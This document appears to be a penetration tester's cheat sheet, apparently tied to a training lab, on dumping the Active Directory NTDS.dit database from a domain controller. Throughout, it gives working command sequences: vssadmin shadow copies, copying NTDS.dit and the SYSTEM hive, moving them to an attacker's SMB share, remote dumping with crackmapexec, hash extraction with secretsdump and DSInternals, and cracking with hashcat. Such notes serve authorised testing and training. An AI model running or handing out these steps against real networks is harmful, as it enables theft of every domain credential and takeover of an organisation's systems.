Attacking NTDS
By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. The .dit stands for directory information tree.
Alternative #1: vssadmin (locally)
1. Connecting to a DC with Evil-WinRM
| evil-winrm -i $DomainControllerIP -u $username -p $password
# Example:
# evil-winrm -i 10.129.201.57 -u bwilliamson -p 'P@55w0rd!'
|
2. Checking Local Group Membership
3. Checking User Account Privileges including Domain
| net user $username
# Example:
# net user bwilliamson
|
4. Creating Shadow Copy of C: We can use vssadmin to create a Volume Shadow Copy (VSS) of the C: drive or whatever volume the admin chose when initially installing AD. It is very likely that NTDS will be stored on C: as that is the default location selected at install.
| vssadmin CREATE SHADOW /For=C:
|
Results:
| Successfully created shadow copy for 'C:\'
Shadow Copy ID: {186d5979-2f2b-4afe-8101-9f1111e4cb1a}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
|
5. Copying NTDS.dit from the VSS: We can then copy the NTDS.dit file from the volume shadow copy of C: onto another location on the drive to prepare to move NTDS.dit to our attack host.
| cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
|
6. We will also need either the SYSTEM hive or bootkey is required for local parsing. So let's save the system hive
| reg.exe save hklm\system C:\system.save
|
7. Transfer file to attacking machine. For instance, with smbserver.py from impacket.
| # From the attacker machine (our kali) all we must do to create the share is run smbserver.py -smb2support using python, give the share a name (CompData) and specify the direct
#########################################
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
# From the victim's machine (windows)
#########################################
# If you are from powershell
cmd.exe /c move C:\NTDS\NTDS.dit \\$ipAttacker\CompData
cmd.exe /c move system.save \\$ipAttacker\CompData
# If you have a cmd terminal
move C:\NTDS\NTDS.dit \\$ipAttacker\CompData
move system.save \\$ipAttacker\CompData
|
8. Extract and crack ntds.dit locally:
| python ~/tools/impacket/examples/secretsdump.py -ntds ~/borrar/NTDS.dit -system ~/borrar/system.save -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
|
Alternative #2: crackmapexec (remotely)
| crackmapexec smb $ip -u $username -p $password --ntds
# Example:
# crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds
|
Cracking a Single Hash with Hashcat
| sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt
|
Alternative #3: DSInternals module (locally)
The DSInternals Framework exposes several internal features of Active Directory and can be used from any .NET application.
Installation
Since PowerShell 5, you can install the DSInternals module directly from the official PowerShell Gallery by running the following command:
| Install-Module DSInternals -Force
|
The DSInternals PowerShell Module can also be installed using the official Chocolatey package by executing the following Chocolatey command:
| choco install dsinternals-psmodule --confirm
|
This package is self-contained and it will also install all dependencies.
Commands to Extract the NTDS file + Boot Key
| Import-Module .\DSInternals.psd1
# Extract the Boot Key from the SYSTEM Hive
$key = Get-BootKey -SystemHivePath .\SYSTEM
# Extract NTLM Hashes for a Specific Account
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
|
Alternative #4: Robocopy (locally)
The built-in utility robocopy can be used to copy files in backup mode as well. Robocopy is a command-line directory replication tool. It can be used to create backup jobs and includes features such as multi-threaded copying, automatic retry, the ability to resume copying, and more.
Robocopy differs from the copy command in that instead of just copying all files, it can check the destination directory and remove files no longer in the source directory.
| robocopy /B E:\Windows\NTDS .\ntds ntds.dit
# -/B → Runs the copy operation in Backup mode, allowing the command to bypass file access restrictions (even for files locked by the system).
# E:\Windows\NTDS → The source folder, which in this case is the Active Directory (AD) database directory on a Windows Domain Controller.
# .\ntds → The destination folder (a local folder named ntds in the current directory).
# ntds.dit → The specific file being copied, which is the Active Directory database.
|
Cracking ntds file
secretsdump.py
We will need either the SYSTEM hive or bootkey:
| python3 /opt/impacket/examples/secretsdump.py -ntds ~/borrar/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
python3 /opt/impacket/examples/secretsdump.py -ntds ~/borrar/ntds.dit -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
|